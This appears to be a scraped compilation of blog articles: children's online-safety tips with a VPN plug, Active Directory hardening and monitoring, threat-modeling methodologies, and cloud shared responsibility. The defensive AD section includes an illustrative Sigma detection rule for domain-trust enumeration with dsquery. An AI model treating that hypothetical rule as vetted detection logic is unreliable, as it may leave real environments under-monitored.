The truth is that they need to know: they need to know your views, your perspective, and the rationale behind them. It will keep them safer and reassure parents that their child is well informed, because once an image is sent, even only to a friend, there is no control over what happens to it or who sees it. Sending sexual images of themselves or of others under 18 could also be classed as possessing and distributing child pornography, which can have serious consequences.

#7 Understand Games and Apps

Games and apps are initially designed to be educational tools that build skills and a sense of achievement, as well as being lots of fun. They can be downloaded from the internet and many are free. Even young children can spend a lot of time playing them.

The best apps are those where children can experiment and try out their own ideas, creating drawings or music. Some apps are less educational, offering little more than repetitive activities. Free apps often have a lot of advertising and in-app purchasing; these can be real purchases and cause “bill shock” for parents. It is also hard for young children to tell the difference between advertising and the game.

One of the first things a parent should do is make sure there is no inappropriate content, violence, sexual images, coarse language or gambling.

Most parents would never encourage their children to gamble. However, simulated gambling may be embedded in children’s games without parents even beginning to realize it.

Exposure to simulated gambling at a young age can make it more likely that children will gamble when older. They can think that gambling is based on skills rather than chance. They often believe the more they play – the better they will get, just as they do in other games. This is reinforced when games make it easier to win than in real-life gambling.

What can be done about it is again education, discussion, use of common sense and logic and always investing time in explaining things to them. Help them recognize gambling and understand how it works but also avoid gambling in front of children and not engage in gambling activity as a family.

#8 Understand Online Violence

Parents should nurture the bond with their children and always lead by example which includes not playing violent games in front of children. Children are quick to spot double standards. You may need to be firm when limiting violent games as some children like these the most.

While a causal link between playing violent games and being violent has not been established, the graphic nature and adult themes can still create an emotional response in your child, inducing nightmares, fears and anxiety.

Young people often enjoy multi-player online games, where they can play with friends and meet new people with similar interests anywhere in the world. In those instances, parents should remind their children to be cautious about sharing personal information, and monitor when they play. Some games run across time zones, which can mean young people are playing when they should be sleeping.

When children and young people spend a lot of time playing games they spend less time doing slower, more demanding tasks like reading or doing homework.

#9 Trust, Invest Time, Monitor, and Educate

Rather than sounding like a broken record, try to sense when it’s a good time to approach and talk to your children. The result will be rewarding: the assurance that they will not make an uninformed decision that might impact their life or your own.

Cyber Safety Advice Checklist for Your Children:

  • Avoid posting personal information.
  • Once you post something, it’s no longer yours and other people can see it.
  • Keep your privacy settings tight and updated.
  • Never share passwords with friends or strangers.
  • Only add people to your networks that you already know.
  • Don’t meet people in person that you met online.
  • Inform your parents or guardian about anyone that suggested a meeting.
  • Not everyone is honest, so they may not be who they say they are.
  • Respect other people even if you disagree with their opinions.
  • Always be polite.
  • Only use the internet when you are around trusted adults.
  • If you see something online that makes you feel unsafe, uncomfortable, scared or worried, leave the site instantly and shut down the device and talk to a trusted adult immediately.

#10 Practice What You Preach

Parents often see their children the same way as when they were born: helpless bundles who will never understand things on their own. This is very far from the truth.

Children understand as much, and in this case sometimes more, than adults. They will see that you are using your real name on social media, that you are playing games, and that you are not careful with your private information and IP. This will make them lose confidence in you and stop listening.

If you have chosen to use a VPN provider for your child’s device, use it on your own too. Le VPN offers 5 simultaneous connections on multiple devices, and it will make you safer. Having sincere discussions with your children about safety, security, and prudence is something that you can do even with a very young child, as they will appreciate you talking to them like an equal.


The internet is a marvelous place, and your children will enjoy both the risks and the benefits of it sooner or later. Starting off early and teaching both yourself and your children about the internet will make all of you more aware of the risks and more knowledgeable on the ways you can use the benefits.

Using a VPN provider, such as Le VPN, will provide you with anonymity, but that is just the first step. Similar to traveling the world, you need to know the rules and the tools, as to make your stay as good as digitally possible.


Credit: https://www.le-vpn.com


Security Hardening & Auditing for Active Directory

A quick summary of Active Directory to get us started. Active Directory is a Microsoft product which runs several services on a Windows server to manage user permissions and access to networked resources. It stores data as objects – which can be users, groups, applications or devices. These are further defined as either resources – such as printers or computers, or security principals – such as users or groups.

From the above, you will understand just how important it is to secure your Active Directory properly. This can be done in a number of ways including hardening, auditing and detection rules.

The first step you should take is hardening your active directory against known attacks and following best practices. There are a lot of great articles out there to follow, starting with the official guide from Microsoft, found here. This contains important topics such as reducing the attack surface, audit policy recommendations and implementing least privilege administrative models.

Next up, activedirectorypro, which details 25 best practices to follow to secure your Active Directory. This contains tips on securing domain admins, local administrators, audit policies, monitoring AD for compromise, password policies, vulnerability scanning and much more.

Finally in terms of long read best practices articles, “The Ultimate Guide to Active Directory Best Practices” from DNSstuff. Like the previous two articles, this covers all important steps to secure your Active Directory.

Domain trusts are an important part of Active Directory security which must not be ignored. Here are some useful articles to understand domain trusts and ensure proper security processes are followed.

Sven also mentions the importance of securely setting up domain trusts. Along with this, he mentions upgrading DCs to at least Windows Server 2016. See this article, which details the process of upgrading your DCs to 2016 along with understanding functional levels. Also see the second comment, which details further tips for securely setting up and using your domain controllers.

Even though Active Directory is the main focus, ensure you do not forget about any *nix systems connected to your active directories. Dependent on the connected systems, ensure they are also configured securely using best practices.

The main point I would like to concentrate on is securing privileged access. Incorrectly set up access is one of the main causes of issues, and the article provided by Nathan is great for resolving these. Check out the article on securing privileged access here. Also don’t forget to check out the PingCastle and BloodHound tools.


Once you believe you have followed the best practices and hardening, the next step is auditing your environment to see where your Active Directory is still vulnerable.

You should use tools such as BloodHound and PingCastle to audit your Active Directory environment.

Let’s start with BloodHound: this article from ZephrFish details what BloodHound is, what it is used for, and how to use it.

Also mentioned is PingCastle. This is a similar tool which can also be used to audit Active Directory environments. Read more about PingCastle here and learn how to use the tool here.

These tools will allow you to find the existing issues in your environment. Take these issues and go back to the start of this post and see the best practices guide to resolve them. Once you are happy that your Active Directory is set up securely, the next step is monitoring rules to detect when malicious actors are attempting to attack your environment.


Once your Active Directory environment has been set up securely and audited, the next step is setting up monitoring rules using a SIEM. To learn more about SIEM, check out my “Learn SIEM for free” article.

As always, there are a large number of rules in the Sigma repository which we can use to monitor Active Directory. The rules can be found in this directory. Please check the logsource definition under each rule, which details its audit/log requirements.
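
For orientation, a Sigma rule is a small YAML document. The example below only illustrates the shape you will find in the repository; the title and the detection values are hypothetical, not a real rule from the repo.

```yaml
# Illustrative Sigma rule: flag dsquery.exe enumerating domain trusts
title: Suspicious Use of DSQuery for Domain Trust Discovery
status: experimental
logsource:
  category: process_creation   # maps to Windows 4688 or Sysmon Event ID 1
  product: windows
detection:
  selection:
    Image|endswith: '\dsquery.exe'
    CommandLine|contains: 'trustedDomain'
  condition: selection
level: medium
```

The logsource block is what the note above refers to: it tells you which audit policy or Sysmon events must be collected for the rule to fire.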

There were also a couple useful comments regarding detection rules.

UltimateWindowsSecurity have a fantastic list of Windows Security Events, with lots of useful information and examples around these events which help you understand them better. Larry is also working on a list of rules which you can check out here.

Sysmon allows for much more detailed monitoring of events and should always be deployed on domain controllers. See the guide from Microsoft here, which explains what Sysmon is, what it can be used for, and how to set it up. Once set up, Sysmon logs can be sent to a central SIEM for more accurate monitoring of events. The Sigma repository above has some rules which require Sysmon. For a more in-depth look into Sysmon, check out this guide from Varonis.
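
To give a flavor of a Sysmon deployment, here is a minimal configuration that logs process creation for a single image. The filter is purely illustrative; production configs (for example SwiftOnSecurity’s widely used one) are far more complete, and the schema version should match your installed Sysmon release.

```xml
<!-- sysmon-config.xml: log process-creation events for PowerShell only (illustrative) -->
<Sysmon schemaversion="4.50">
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Image condition="end with">powershell.exe</Image>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>
```

Installed from an elevated prompt with: sysmon64 -accepteula -i sysmon-config.xml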


At this point you will now have your Active Directory set up securely, audited and well monitored. I hope you have found this article useful and learned something from it. I’d like to thank everyone again who replied to the thread with useful resources, points and articles of their own.

Threat Modeling


What Is Threat Modeling?

Threat modeling is a proactive approach to identifying entry points to enumerate threats and building security measures to prevent security breaches in applications and computer and network systems. It’s an engineering technique you can use to help you identify threats, attacks, vulnerabilities, and countermeasures that could affect your application and systems. You can use threat modeling to shape your application’s and system’s design and improve security.

Threat modeling provides a good foundation for specifying security requirements during application development. When applied during the early phases of software development, threat modeling empowers developers in several ways, from verifying application architecture, identifying and evaluating threats, and designing countermeasures, to penetration testing based on a threat model. There is, however, a paucity of established techniques and tools for threat modeling and analysis.

What Most Threat Models Include

Because every system is unique, threat models do not all look the same, but they generally include the following basics:

  • A description of the threat
  • A list of assumptions regarding the function of the software or organization that can be reviewed in the future
  • Actions for each vulnerability
  • How to review and verify the vulnerabilities are being watched and are secure

Why is threat modeling necessary?

As organizations become more digital and cloud-based, IT systems face increased risk and vulnerability. Growing use of mobile and Internet of Things (IoT) devices also expands the threat landscape. And while hacking and distributed-denial-of-service (DDoS) attacks repeatedly make headlines, threats can also come from within: from employees trying to steal or manipulate data, for example.

Smaller enterprises are not immune to attacks either; in fact, they may be more at risk because they lack adequate cybersecurity measures. Malicious hackers and other bad actors make risk assessments of their own and look for easy targets.

Threat Modeling Methodologies

OCTAVE (Practice Focused)
The Operationally Critical Threat, Asset, and Vulnerability Evaluation (OCTAVE) methodology[1] was one of the first created specifically for cybersecurity threat modeling. Developed at Carnegie Mellon University’s Software Engineering Institute (SEI) in collaboration with CERT, the OCTAVE methodology is heavyweight and focused on assessing organizational (non-technical) risks that may result from breached data assets.

Using this threat modeling methodology, an organization’s information assets are identified and the datasets they contain receive attributes based on the type of data stored. The intent is to eliminate confusion about the scope of a threat model and reduce excessive documentation for assets that are either poorly defined or are outside the purview of the project.

Though OCTAVE threat modeling provides a robust, asset-centric view and organizational risk awareness, the documentation can become voluminous. OCTAVE also lacks scalability: as technological systems add users, applications, and functionality, a manual process can quickly become unmanageable.

This method is most useful when creating a risk-aware corporate culture. The method is highly customizable to an organization’s specific security objectives and risk environment.

Trike Threat Modeling (Acceptable Risk Focused)
Trike threat modeling is a unique, open-source threat modeling process focused on satisfying the security auditing process from a cyber risk management perspective.[2] It provides a risk-based approach with a unique implementation and risk-modeling process. The foundation of the Trike methodology is a “requirements model,” which ensures the assigned level of risk for each asset is “acceptable” to the various stakeholders.

With the requirements model in place, the next step in Trike threat modeling is to create a data flow diagram (DFD). System engineers created data flow diagrams in the 1970s to communicate how a system moves, stores and manipulates data. Traditionally they contained only four elements: data stores, processes, data flows, and interactors.

The concept of trust boundaries was added in the early 2000s to adapt data flow diagrams to threat modeling. In the Trike methodology, DFDs are used to illustrate data flow in an implementation model and the actions users can perform within a system state.

The implementation model is then analyzed to produce a Trike threat model. As threats are enumerated, appropriate risk values are assigned to them from which the user then creates attack graphs. Users then assign mitigating controls as required to address prioritized threats and the associated risks. Finally, users develop a risk model from the completed threat model based on assets, roles, actions and threat exposure.
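A rough sketch of this flow, assuming hypothetical element and risk representations (Trike defines its own tooling and risk scales; nothing below is taken from the official specification):

```python
# Hypothetical sketch of Trike-style risk assignment over DFD elements.
# Element kinds follow the four traditional DFD types plus trust boundaries.
DFD_KINDS = {"data_store", "process", "data_flow", "interactor", "trust_boundary"}

def acceptable(assigned_risk: int, stakeholder_threshold: int) -> bool:
    """Trike's requirements model asks whether the risk assigned to an
    asset is acceptable to stakeholders; modeled here as a simple compare."""
    return assigned_risk <= stakeholder_threshold

# Enumerated threats with risk values assigned (scale is illustrative).
threats = [
    {"element": "data_store", "name": "customer DB tampering", "risk": 7},
    {"element": "data_flow", "name": "credentials sniffed in transit", "risk": 4},
]

# Keep only threats whose risk exceeds what stakeholders accept,
# i.e. those that need mitigating controls.
needs_controls = [t for t in threats if not acceptable(t["risk"], 5)]
print([t["name"] for t in needs_controls])  # → ['customer DB tampering']
```

The useful idea is the ordering: risk values come first, and mitigating controls are assigned only where the requirements model says the residual risk is not acceptable.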

However, because Trike threat modeling requires a person to hold a view of the entire system to conduct an attack surface analysis, it can be challenging to scale to larger systems.

P.A.S.T.A. Threat Modeling (Attacker Focused)
The Process for Attack Simulation and Threat Analysis is a relatively new application threat modeling methodology.[3] PASTA threat modeling provides a seven-step process for risk analysis which is platform insensitive. The goal of the PASTA methodology is to align business objectives with technical requirements while taking into account business impact analysis and compliance requirements. The output provides threat management, enumeration, and scoring.
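The seven stages are commonly summarized as below; this enumeration paraphrases how PASTA is generally described in the literature and is not an official artifact of the methodology:

```python
# The seven PASTA stages, paraphrased from common descriptions of the method.
PASTA_STAGES = (
    "Define business objectives",
    "Define the technical scope",
    "Decompose the application",
    "Analyze threats",
    "Analyze vulnerabilities and weaknesses",
    "Model attacks",
    "Analyze risk and business impact",
)

for number, stage in enumerate(PASTA_STAGES, start=1):
    print(f"Stage {number}: {stage}")
```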

The PASTA threat modeling methodology combines an attacker-centric perspective on potential threats with risk and impact analysis. The outputs are asset-centric. Also, the risk and business impact analysis of the method elevates threat modeling from a “software development only” exercise to a strategic business exercise by involving key decision makers in the process.

PASTA threat modeling works best for organizations that wish to align threat modeling with strategic objectives because it incorporates business impact analysis as an integral part of the process and expands cybersecurity responsibilities beyond the IT department.

This alignment can sometimes be a weakness of the PASTA threat modeling methodology. Depending on the technological literacy of key stakeholders throughout the organization, adopting PASTA can require many additional hours of training and education.

STRIDE Threat Modeling (Developer Focused)
STRIDE stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. Microsoft’s threat modeling methodology, commonly referred to as STRIDE, aligns with the company’s Trustworthy Computing directive of January 2002.[4] The primary focus of that directive is to help ensure that Microsoft’s Windows software developers think about security during the design phase.

The STRIDE threat modeling goal is to get an application to meet the security properties of Confidentiality, Integrity, and Availability (CIA), along with Authorization, Authentication, and Non-Repudiation. Once the security subject matter experts construct the data flow diagram-based threat model, system engineers or other subject matter experts check the application against the STRIDE threat model classification scheme.
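Each STRIDE category is the violation of one of these security properties, and that mapping is standard. The sketch below encodes it as a simple lookup (the function name is mine, not part of the methodology):

```python
# Each STRIDE threat category undermines exactly one security property.
STRIDE = {
    "Spoofing": "Authentication",
    "Tampering": "Integrity",
    "Repudiation": "Non-repudiation",
    "Information Disclosure": "Confidentiality",
    "Denial of Service": "Availability",
    "Elevation of Privilege": "Authorization",
}

def violated_property(threat_category: str) -> str:
    """Return the security property a STRIDE category undermines."""
    return STRIDE[threat_category]

print(violated_property("Tampering"))  # → Integrity
```

Checking each element of the data flow diagram against all six categories is what “checking the application against the STRIDE classification scheme” means in practice.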

This methodology is both well documented and well known, owing to Microsoft’s significant influence in the software industry and its Threat Modeling Tool (TMT).

VAST Threat Modeling (Enterprise Focused)
The Visual, Agile, and Simple Threat modeling (VAST) methodology was conceived after reviewing the shortcomings and implementation challenges inherent in the other threat modeling methodologies. The founding principle is that, in order to be effective, threat modeling must scale across the infrastructure and entire DevOps portfolio, integrate seamlessly into an Agile environment and provide actionable, accurate, and consistent outputs for developers, security teams, and senior executives alike.

A fundamental difference of the VAST threat modeling methodology is its practical approach. Recognizing that the security concerns of development teams are distinct from those of infrastructure teams, this methodology calls for two types of threat models: application threat models for development teams and operational threat models for infrastructure teams.

Why Should You Threat Model?

Threat modeling gives a complete picture of the threats and possible attack paths. These attack paths can subsequently be used, for instance, to create efficient test scenarios, adjust the design, or define additional mitigating measures. Beyond these deliverables, the threat modeling workshop itself is a great way to raise security awareness and collaboration.

This allows you to execute concrete next steps in improving security.

Cloud shared responsibility


When adopting the cloud, we often overlook security and assume the cloud provider will handle it. However, it is important to understand that security responsibility does not lie solely with the cloud provider: security is a shared responsibility when using the cloud.

Below, I outline the security responsibilities of each stakeholder under the different cloud service models.

Infrastructure-as-a-Service (IaaS)

Designed to provide the highest degree of flexibility and management control to customers, IaaS services also place more security responsibilities on customers. Let’s use Amazon Elastic Compute Cloud (Amazon EC2) as an example.

When customers deploy an Amazon EC2 instance, they are the ones who manage the guest operating system, any applications they install on those instances, and the configuration of the provided firewalls (security groups). They are also responsible for overseeing data, classifying assets, and implementing the proper permissions for identity and access management.

While IaaS customers retain a lot of control, they can lean on CSPs to manage security from a physical, infrastructure, network, and virtualization standpoint.

Platform-as-a-Service (PaaS)

In PaaS, more of the heavy lifting is passed over to CSPs. While customers focus on deploying and managing applications (as well as managing data, assets, and permissions), CSPs take control of operating the underlying infrastructure, including guest operating systems.

From an efficiency standpoint, PaaS offers clear benefits. Without having to worry about patching or other updates to operating systems, security and IT teams recoup time that can be allocated to other pressing matters.

Software-as-a-Service (SaaS)

Of the three deployment options, SaaS places the most responsibility on the CSP. With the CSP managing the entire infrastructure as well as the applications, customers are only responsible for managing data and user access/identity permissions. In other words, the service provider manages and maintains the software; customers just decide how they want to use it.
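As a rough summary of the three sections above, the split can be sketched as a lookup table. The exact boundary varies by provider and service, so treat this as illustrative rather than contractual:

```python
# Illustrative shared-responsibility matrix: who manages each layer
# under the three service models ("CSP" = cloud service provider).
RESPONSIBILITY = {
    "IaaS": {
        "physical/network/virtualization": "CSP",
        "guest OS": "customer",
        "applications": "customer",
        "data and access management": "customer",
    },
    "PaaS": {
        "physical/network/virtualization": "CSP",
        "guest OS": "CSP",
        "applications": "customer",
        "data and access management": "customer",
    },
    "SaaS": {
        "physical/network/virtualization": "CSP",
        "guest OS": "CSP",
        "applications": "CSP",
        "data and access management": "customer",
    },
}

# The customer's share shrinks as you move from IaaS toward SaaS,
# but data and access management never leave the customer.
for model, layers in RESPONSIBILITY.items():
    customer_layers = [layer for layer, owner in layers.items() if owner == "customer"]
    print(model, "->", customer_layers)
```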
